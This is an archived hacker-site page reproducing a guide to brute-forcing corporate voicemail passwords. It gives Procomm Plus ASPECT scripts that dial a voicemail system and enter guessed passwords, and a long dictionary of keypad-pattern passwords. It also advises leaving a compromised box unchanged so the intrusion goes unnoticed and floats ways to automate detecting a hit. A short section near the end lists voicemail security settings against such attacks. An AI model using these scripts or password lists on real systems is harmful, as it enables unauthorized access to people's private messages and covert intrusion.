Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Phreaking Voice Mail :: voicemhk.htm

Voicemail Hacking



www.m4phr1k.com (home page)
VOICEMAIL HACKING SECTION
(Excerpts and other details from HE written by Stephan Barnes  "M4phr1k")
If you got here via PenTest thread from SF (June 2003).. Welcome and have a look around...
History

Two programs that attempted to hack voicemail systems were written in the early 1990's, specifically, Voicemail Box Hacker 3.0 and VrACK 0.51. I have attempted to utilize these tools in the past and they were primarily written for much older and less secure voicemail systems. The Voicemail Box Hacker program would only allow for testing of voicemail's with four digit passwords and it is not expandable in the versions we have worked with. The program VrACK, has some interesting features, however it is difficult to script, was written for older x.86 architecture based machines, and is somewhat unstable in newer environments. Both of these programs were probably not supported further due to the relative unpopularity of trying to hack voicemail, hence updates were never continued.

Hence hacking voicemail leads us to the advent of using our trusty ASPECT scripting language again.

Similar to brute force hacking dial-up connections using our ASPECT scripts described in the other sections of my site, voicemail boxes can be hacked in a similar fashion. The primary difference though is that using the brute force scripting method, the assumption bases change because essentially you are going to use the scripting method and at the same time listen for a successful hit instead of logging and going back to see if something occurred. Hence this example is an attended or manual hack, and not one for the weary, but one that can work using very simple passwords and combinations of passwords that voicemail box users might choose.


In order to attempt to compromise a voicemail system either manually or by programming a brute force script (not using social engineering in this example), the required necessary components are the number of the primary number to access voicemail, a target voicemail box, including the amount of digits (typically three, four, or five) and an educated guess about the minimum and maximum length of the voicemail box password. In most modern organizations, certain presumptions about voicemail security can usually be made. These presumptions have to do with minimum and maximum password length, and default passwords to name a few. A company would have to be insane to not turn on at least some minimum security, however we have seen it happen. Let's assume though that there is some minimum security and that voicemail boxes of our target company do have passwords. With that let the scripting begin.


Our goal is to make something similar to this simple script shown below. Let's first examine what we want the script to do.

This is a simple example of a script that dials the voicemail box system, waits for the auto attendant to say the greeting such as "Welcome to Company X's voicemail system, mailbox number please…", puts in the voicemail box number, hits pound to accept, then puts in a password, and then pound, then tries the process one more time. This example tests 6 passwords for voicemail box 5019.

Using some ingenuity with your favorite programming language, you can easily create this repetitive script using a dictionary of numbers at your choice. Tweaking of the script, programming for modem characteristics and other potential hiccups will most likely need to occur. This same script can execute nicely on one system and poorly on another. Hence listening to the script as it executes and paying close attention to the process is invaluable.

Once you have your test prototype down, then you can use a much larger dictionary of numbers that will be discussed below.

Hacking Voicemail with Procomm Plus

Simple Voicemail Hacking Script in Procomm Plus ASPECT language
(THIS SAMPLE SCRIPT WORKS WITH NEWER VERSIONS OF PROCOMM and doesn't work with PCPLUSTD because WAITQUIET wasn't invented yet. You may need to tweak your settings to get it to work right. It is the concept of how to do it that I want to hit home)

"ASP/WAS script for Procomm Plus Voicemail Hacking
"Written by M4phr1k, www.m4phr1k.com, Stephan Barnes
proc main
transmit "atdt*918005551212,,,,,5019#,111111#,,5019#,222222#,,"
transmit "^M"
WAITQUIET 37
HANGUP
transmit "atdt*918005551212,,,,,5019#,333333#,,5019#,555555#,,"
transmit "^M"
WAITQUIET 37
HANGUP
transmit "atdt*918005551212,,,,,5019#,666666#,,5019#,777777#,,"
transmit "^M"
WAITQUIET 37
HANGUP
endproc

(THIS SAMPLE SCRIPT VOICEMAIL HACKING EXMAMPLE (shown below) WORKS WITH PCPLUSTD)

Below is a simple preview of what you'd need to tell Procomm Plus aspect script to do in order to repeatedly hack a voicemail system.  

Set up PCPLUSTD

The Premise: Pretend the phone number is your target voicemail system (1800X66X665) and that the target mailbox is 9999.

This Script below

This is an ATTENDED HACK so that means you HAVE TO BE THERE LISTENING to the result - - - Or do you?

(Yes you do unless you figure a way to walk away and be able to look for a hit if you get one)

AND you may have to mess with the WAITFOR time (shown as 33 below)...

different phone systems connect at different SPEEDS... this is for a total routine that lasts 33 seconds...you may need to increase the time to get to the end of the transmit.

You'll see what I mean if you listen to it.

;; VOICEMAIL HACKING EXAMPLE
;; Stephan Barnes (M4phr1k)
;; Works with PCPLUSTD available on http://www.m4phr1k.com
;; You need to LISTEN to this! Hint...
TRANSMIT "atdt1800X66X665,,,,#,,9999,,111111#,,222222#,,,*"
TRANSMIT "^M"
WAITFOR 33
HANGUP
TRANSMIT "atdt1800X66X665,,,,#,,9999,,111112#,,232222#,,,*"
TRANSMIT "^M"
WAITFOR 33
HANGUP
;;you could go on and on....

 
Voicemail Passwords
The relative good news (from a time perspective and math perspective in trying to get to the password)is that almost all voicemail box passwords are only numeric numbers from 0 to 9, so for the mathematicians, there is a finite amount of numbers that can be tried.

That finite number depends upon the maximum length of the password. The longer the password, the longer the theoretical time it will take to compromise the voicemail box. However, the downside again with this process is that it's an attended hack, something you have to listen to while it is going. However, a clever person could tape record the whole session and play it back later, or take DSP processing and look for anomalies and trends in the process. Regardless of taped or live, you are listening for the anomaly and planning for failure most of the time.

The success message is usually "You have X new messages, Main menu, ….". Every voicemail system has different auto attendants and if you are not familiar with a particular target's attendant, you might not know what to listen for. But don't shy away from that because you are listening for an anomaly in a field of failures. Try it and you'll get the point quickly. Look at the finite math of brute forcing from 000000 to 999999 and you'll see the time it takes to hack the whole "key space" is long. As you add a digit the exponential goes up. Hence other methods might be useful to reduce the testing time.


So what can we do to help reduce our finite testing times. One method is to use characters (numbers) that people might tend to easily remember. The phone keypad is an incubator for patterns because of its square design. Users might use passwords that are in the shape of a Z going from 1235789. With that being said here is list of patterns I have amassed mostly from observing the phone keypad. This is not a comprehensive list, but a pretty good listing to try. Remember to try the obvious things also, such as the same password as the voicemail box, repeating characters like 111111 that might be a temporary default password. The more revealing targets will be those that have already set up a voicemail box, but occasionally you can find a set of voicemail boxes that were set up but never used by anyone. There's not much point to compromising boxes that have yet to be setup, unless you are an auditor type trying to get people to listen and practice better security.

Sequence Pattern Examples:

123456
234567
345678
456789
567890
678901
789012
890123
901234
012345
654321
765432
876543
987654
098765
109876
210987
321098
432109
543210
123456789
987654321

Up and Down Patterns

147741
258852
369963
963369
159951
123321
456654
789987
987654
123369
147789
357753

Z's

1235789
9875321

Repeats

335577
115599
775533
995511

U: 1478963

Inverted U: 7412369

Right U: 1236987

Left U: 3214789

Angles |_: 14789

Angles _|: 78963

Angles -|: 12369

Angles |-: 32147

0's starting at diff points: 147896321
0's starting at diff points: 478963214
0's starting at diff points: 789632147
0's starting at diff points: 896321478
0's starting at diff points: 963214789
0's starting at diff points: 632147896
0's starting at diff points: 321478963
0's starting at diff points: 214789632

X's starting at diff points: 159357
X's starting at diff points: 357159
X's starting at diff points: 159753
X's starting at diff points: 753159
X's starting at diff points: 951357
X's starting at diff points: 357951

+'s starting at diff points: 258456
+'s starting at diff points: 258654
+'s starting at diff points: 456258
+'s starting at diff points: 456852
+'s starting at diff points: 654852
+'s starting at diff points: 654258
+'s starting at diff points: 852456
+'s starting at diff points: 852654

Z starting at diff points: 1235789
Z starting at diff points: 3215978
Z starting at diff points: 9875321
Z starting at diff points: 1895123

Top
Skip over across: 172839
Skip over across 1: 283917
Skip over across 2: 391728

Reverse
Skip over across: 392817
Skip over across 1: 281739
Skip over across 2: 173928

Bottom
Skip over across: 718293
Skip over across 1: 829371
Skip over across 2: 937182

Reverse
Skip over across: 938271
Skip over across 1: 827193
Skip over across 2: 719382

Left to right
Skip over across: 134679
Skip over across 1: 467913
Skip over across 2: 791346

Reverse
Skip over across: 316497
Skip over across 1: 649731
Skip over across 2: 973164

IF you were successful:

Once you have compromised a target, be careful not to change anything. If you changed the password of the box, it might get noticed, unless the person is not a rabid voicemail user or if they are out of town or on vacation. There are very rare instances of companies that have set up policies to change voicemail passwords every X days like computing systems. Hence once someone sets a password, they rarely change it. Listening to other people's messages might land you in jail, so we are not preaching that you should try to get onto a voicemail system this way. As always, we are pointing out the theoretical points of how voicemail can be hacked.

Lastly, this brute force method could benefit from automation of listening for the anomaly. I have theorized that if the analog voice could be captured into some kind of digital signal processing (DSP) device or if a speak and type program were training properly and listening for the anomaly in the background, it might just save having to sit and listen to the script.

Example of Levels of Security for Voicemail systems:

Considering the relative ease that you can hack voicemail here are some levels of protection to consider.

-----------------------------------------------------------------------------------------------------------------------------------------

Bronze: VM system that you have configured to have

a minimum password length of at least 8 characters probably no more than 16;

doesnt allow repeating digits ie (11111111),

doesnt allow sequences (12345678),

doesnt allow same number as the voicemail box, forward or backward,

inactivates unused voicemail boxes (one's that new users have not set up) within 5 days of its creation,

locks out a user after 10 failed attempts at the password (longer or shorter fail attempt number depends upon your user base)

doesn't automatically reset a failed attempt counter after a certain amount of time

reset password's and failed attempt counters must be manually reset by the system administrator

-----------------------------------------------------------------------------------------------------------------------------------------

Silver: All of the above but forces a password change every 90 to 180 days.

-----------------------------------------------------------------------------------------------------------------------------------------

Gold: same as all of the above but uses a challenge response mechanism as an add-on to access the voicemail system.

(Note: I have rarely seen this implemented, although have heard it is possible and this would be for voicemail systems of EXTREMELY sensitive nature)

-----------------------------------------------------------------------------------------------------------------------------------------

Bottom line - don't assume that general security is protecting your voicemail so don't leave sensitive information in voicemail

 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH